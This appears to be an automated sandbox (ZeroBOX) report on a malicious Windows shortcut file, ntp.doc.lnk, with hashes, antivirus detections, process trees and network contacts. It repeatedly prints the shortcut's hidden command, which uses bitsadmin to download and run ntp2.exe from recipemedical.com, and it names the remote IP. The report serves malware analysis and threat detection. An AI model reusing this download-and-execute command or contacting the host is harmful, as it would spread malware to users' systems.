Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Sept. 27, 2023, 10:38 a.m.	Sept. 27, 2023, 10:41 a.m.

Size	2.1KB
Type	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=0, Archive, ctime=Wed Oct 6 04:31:17 2021, mtime=Sat Sep 23 12:44:40 2023, atime=Wed Oct 6 04:31:17 2021, length=236544, window=hide
MD5	`10a485b8c65306f6e992e68ab96bd6b6`
SHA256	`93ef3ba4b4896b56850ef0a5f894155c163fe6d86fd5a70134b38ee1a7e2447a`
CRC32	`529917F4`
ssdeep	`24:83IJ3q3c/wT+MacqJM9BGPJ+/omxdd2sZDjWCCZZq5CwdRqaqNp1deOm:8+3DzcqJwG4msZDjWCCZZ4RI1gO`
Yara	Lnk_Format_Zero - LNK Format lnk_file_format - Microsoft Windows Shortcut File Format Generic_Malware_Zero - Generic Malware

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "IZFDLWw" C:\Users\test22\AppData\Local\Temp\ntp.doc.lnk
2576
- cmd.exe "C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'
  2696
  - bitsadmin.exe bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe'
    2800

Name	Response	Post-Analysis Lookup
recipemedical.com	A 45.15.157.175	45.15.157.175

IP Address	Status	Action
164.124.101.2	Active	Moloch
45.15.157.175	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (48 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: BITSADMIN version 3.0 [ 7.5.7601 ] console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: BITS administration utility. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: (C) Copyright 2000-2006 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: Update' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: FOREGROUND console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: Update' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: CONNECTING console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: FOREGROUND console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: TRANSFER RATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:38 a.m.	buffer: 0.00 B/S console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DISPLAY: ' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: Update' console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TYPE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: DOWNLOAD console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: STATE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: TRANSIENT_ERROR console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: PRIORITY: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FOREGROUND console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: FILES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: BYTES: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0 / UNKNOWN console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR FILE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: https://recipemedical.com/archive/ntp2.exe -> C:\Users\test22\Ap console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR CODE: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0x80072ee2 - 작업 시간을 초과했습니다. console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: ERROR CONTEXT: console_handle: 0x00000007	1	1
WriteConsoleW Sept. 27, 2023, 10:39 a.m.	buffer: 0x00000005 - 원격 파일을 처리하는 동안 오류가 발생했습니다. console_handle: 0x00000007	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\ntp.doc.lnk

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'

Yara rule detected in process memory (9 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

BITSAdmin Tool has been invoked to download a file

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2576 resumed a thread in remote process 2696
NtResumeThread Sept. 27, 2023, 10:38 a.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2696	1	0	0

Uses suspicious command line tools or Windows utilities (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /C bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe' & start C:\Users\test22\AppData\Local\Temp\ntp2.exe'
cmdline	bitsadmin /transfer Update /download /priority FOREGROUND https://recipemedical.com/archive/ntp2.exe C:\Users\test22\AppData\Local\Temp\ntp2.exe'

File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

MicroWorld-eScan	Heur.BZC.YAX.Pantera.23.1941B292
FireEye	Heur.BZC.YAX.Pantera.23.1941B292
McAfee	Downloader-FBRQ!10A485B8C653
Arcabit	Heur.BZC.YAX.Pantera.23.1941B292 [many]
Cyren	LNK/Bitsldr.B!Camelot
ESET-NOD32	BAT/TrojanDownloader.Agent.OWA
Kaspersky	HEUR:Trojan.Multi.Bitsuh.a
BitDefender	Heur.BZC.YAX.Pantera.23.1941B292
Emsisoft	Heur.BZC.YAX.Pantera.23.1941B292 (B)
F-Secure	Trojan:W32/LnkGen.C
VIPRE	Heur.BZC.YAX.Pantera.23.1941B292
TrendMicro	HEUR_LNKEXEC.A
McAfee-GW-Edition	BehavesLike.Trojan.xx
Sophos	Mal/DownLnk-F
Microsoft	Trojan:Win32/AggBITSAbuse.A
ZoneAlarm	HEUR:Trojan.Multi.Bitsuh.a
GData	Heur.BZC.YAX.Pantera.23.1941B292
Google	Detected
VBA32	Trojan.Link.DoubleRun
ALYac	Heur.BZC.YAX.Pantera.23.179DB6BB
MAX	malware (ai score=86)
Zoner	Probably Heur.LNKScript
Rising	Downloader.BitsAdmin/LNK!1.BAE7 (CLASSIC)

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

45.15.157.175:443

ntp.doc.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All